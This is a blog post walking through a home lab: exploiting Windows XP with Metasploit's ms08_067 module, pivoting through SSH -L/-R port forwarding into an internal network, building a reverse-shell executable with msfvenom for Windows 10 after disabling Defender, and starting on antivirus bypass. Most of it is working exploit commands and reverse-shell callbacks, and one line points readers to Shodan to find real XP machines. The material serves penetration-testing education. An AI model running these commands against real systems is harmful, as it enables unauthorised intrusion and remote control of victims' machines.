Real Hacking Challenge - victim behind ssh

the challenge is like this, i have the attacker machine (A), which connect with ssh client to another machine (B), which run ssh server (daaa...), these 2 are connected to the internet, but (B) is also connected to an internal network, and there there is a WIN10 machine (C), NOT connected to the internet but to (B) as said.

we will use the help of ssh, ShellTer to try also do it with windows defender on.

to succeed we will try to do this from bottom to top.

*DISCLAIMER - all this is illegal, and you may only do it at your lab, if you hack really you will go to jail.

*BIG NOTE : sometimes stuff just dont work, restarting (not power off) the machines, and the services refreshes stuff and then they work.


PLAN

1. prepare lab
2. test exploit on xp
3. test 3 machines ssh with 3 linux
4. exploit xp via ssh
5. exploit win10
6. test ssh with win 10
7. exploit win10 via ssh





1. preparing lab

using VBox (doesnt matter) i will create 4 machines, an arbitrary linux for ssh server, winXP for testings, win10, and my host is kali, but you can always just run a 4th as kali (or other, you just need metasploit), and another linux for the ssh test.

linux can be downloaded at osboxes, and for windows  there is MS site, and xp here.

dont use torrents, they are all infected.

machine users from osboxes are "osboxes", default pass (for root also) is "osboxes.org"

i do expect you to test and learn what i do, like "show options" in msf, "cat" when i touch files, browse to our files (127.0.0.1) ect., AND GOOGLE EVERY COMMAND YOU DONT KNOW!!!


2. test expliot on XP

as said, 1st let do it with XP to see we're good, let try the super simple smb expliot
"https://www.binarytides.com/hack-windows-xp-metasploit/"

i just run my xp on vbox as bridged, lest see we're inside the network

*IMPORTANT you might no see ping without sharing a folder, so create a folder like "c:\foo" and share it with everyone, same with Win10.

(shots with Gnome Shots -  Using shortcut keys shift+printscreen(PrtScr))
also "apt-get install gimp"



kali ifconfig and ping




make sure that (after sharing) port 445 (smb) is open


exploit!

open terminal and write (your job to read about it here) the following commads 1 by 1:

msfconsole
use exploit/windows/smb/ms08_067_netapi 
set RHOST 10.0.0.6
set payload windows/meterpreter/reverse_tcp
set LHOST 10.0.0.5
set LPORT 9999
exploit
shell

if you did it all right, you should have a shell, yep, that easy to take over an XP, goto SHODAN and find XP's. again, its ILLEGAL.



3. test 3 machines ssh with 3 linux 

this is just to make things easy, i open 2 linux machines, 1 with ssh server and another with apache2 server.

running ifconfig i can see them being 10.0.0.7/8, the 1st (ubuntu) gets to be the ssh server

sudo apt-get install -y openssh-server
sudo systemctl start ssh

test connection with kali

ssh osboxes@10.0.0.7
-1st time will ask if you trust the auth key, write "yes"

and we're in




next lets create a webserver with a simple page at the other maching (mint)

sudo apt-get install -y apache2
sudo service apache2 start
cd /var/www/html/
sudo chmod 777 index.html
echo "U R IN MINT" > index.html

check 7 can browse to 8.

now let's close 8, and make an internal network for 7 and 8.

if you run vbox, you need to enable DHCP so that the machines in the internal network will get ip's (as you can see i changed defaults, i you didnt change back "inter-ssh" to "intnet")

VBoxManage dhcpserver add --netname inter-ssh --ip 22.22.22.1 --netmask 255.255.255.0 --lowerip 22.22.22.2 --upperip 22.22.22.222 --enable


so now the job is like this, from kali (10.0.0.5), open ssh to ubuntu (10.0.0.7) but redirect to mint (22.22.22.2 to 22.22.22.3)

make sure u can browse with middle machine yet not with kali (ping).


so...
ssh has -R and -L options.

-L means, mr. ssh server, you, the local (L), plz redirect everything i send you from port X to port Y.

so if i do

ssh -L 7777:22.22.22.3:80 osboxes@10.0.0.7

and browse to 127.0.0.1 IN MY KALI i can see my mint page!
since i told my ssh client that anything from my kali port 7777 send to ubuntu at port 80

that's it! browse to 127.0.0.1



if you will "netstat -ant" at the 3 mahines, you will be able to follow the request.
in my case, at kali, the flow is

browser                  ssh default port        random port for established connection
127.0.0.1:7777 ->      10.0.0.5:22      -> 10.0.0.7:33128

and then in ubuntu (and mint) there is 22.22.22.2:36096 -> 22.22.22.3:80

so -L tell MY machine to port-forwad port X to the ssh port and then tells the SERVER to forward that to IP:PORT of my choise.

btw
ssh -R 5555:10.0.0.5:80 osboxes@10.0.0.7

meant that whenever you go IN THE SERVER to localhost:5555 go back to client at :5555.
i can also specify another ip and port, to another remote.

! IMPORTANT
you MUST set the "/etc/ssh/sshd_config" value of GatewayPorts=yes at the server.
adding as -o will only be relevant for the client.
test with "netstat -ant" and you should see your port binded to 0.0.0.0 and not 127.0.0.1.

so lets finally test 2 way running, we will tell the host that when i call server:8083 go to mint:80, and i should see "U R IN MINT" from my kali, and server:8081 to my kali:80, therefor mint will see "U R IN KALI" like this

remember, -L says, when i go to myself@port, you server, go to host@port.
-R says, when someone go to server@port, come back to myself and i go to host@port.

ssh -R 8081:10.0.0.5:80 -L 8083:22.22.22.3:80 osboxes@10.0.0.7 

will enable me @kali to do 127.0.0.1:8083 and see mint, while mint can 22.22.22.2:8081 and see kali.



4. exploit xp via ssh

so lets kill the mint and open the xp with the internal network, and ping to make sure.

went back to LAN so new ip map is:
kali (host) : 192.168.1.2
server (ubuntu) : 192.168.1.6 and also 22.22.22.3
xp : 22.22.22.4

then, lets ping via the ssh to the xp:

ssh osboxes@192.168.1.6 ping 22.22.22.4

let port forward the 445 to the xp, and :9999 back to myself

ssh -L :445:22.22.22.4:445 -R 22.22.22.3:4444:192.168.1.2:4444  osboxes@192.168.1.6 -v

and try the exploit again (with explanations):

open the metasploit console
msfconsole
use the exploit of choise
use exploit/windows/smb/ms08_067_netapi 
use the payload of choise
set payload windows/meterpreter/reverse_tcp
set the "victim" to localhost, i left the default port 445
set RHOST 0.0.0.0
set the real listener to yourself, the attacker

set ReverseListenerBindAddress 192.168.1.2
tell the payload where to call, i left the default port 4444 
set LHOST 22.22.22.3
exploit
shell

now let me tell you about the problems you are to meet... every little miss...
the ssh server is not correctly closed, you can netstat -ant/antup to test all the following, so you need to restart the service.

also you might trigger the exploit, so then you must restart the xp.

last you might even already create a connection to the kali, so you must close all terminals until you see the netstat clean



5. exploit win10

starting win10 as bridged, getting address of 192.168.1.13....

with windows 10, its either you have some unpatched windows, for the cool stuff, or, in my case, i missed and it auto-updated, we must send a malicious exe file

we can create the payload, the malicious file, with msfvenom, and put it in our server

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.2 LPORT=4444 -f exe > /var/www/html/win10/mything.exe

now, open the win10, and we need to shut-down the windows defender, so

start -> windows defender -> turn off Real Time Protection

when a warning will jump, you must press the X and not the msg.

now, let use msfconsole to create a listener

use exlpoit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.1.2
set LPORT 4444
exploit

now when you will run the exe you will get a session.


BYPASS AV(Anti Virus - defender)

get windows compiler

apt-get install mingw-w64

For 64-bit use: x86_64-w64-mingw32-g++
For 32-bit use: i686-w64-mingw32-g++























Comments

Popular posts from this blog

OverTheWire[.com] Natas Walkthrough - JUST HINT, NO SPOILERS

Asp.Net Ending Response options, Response.End() vs CompleteRequest()

SOLVED The item could not be indexed successfully because the item failed in the indexing subsystem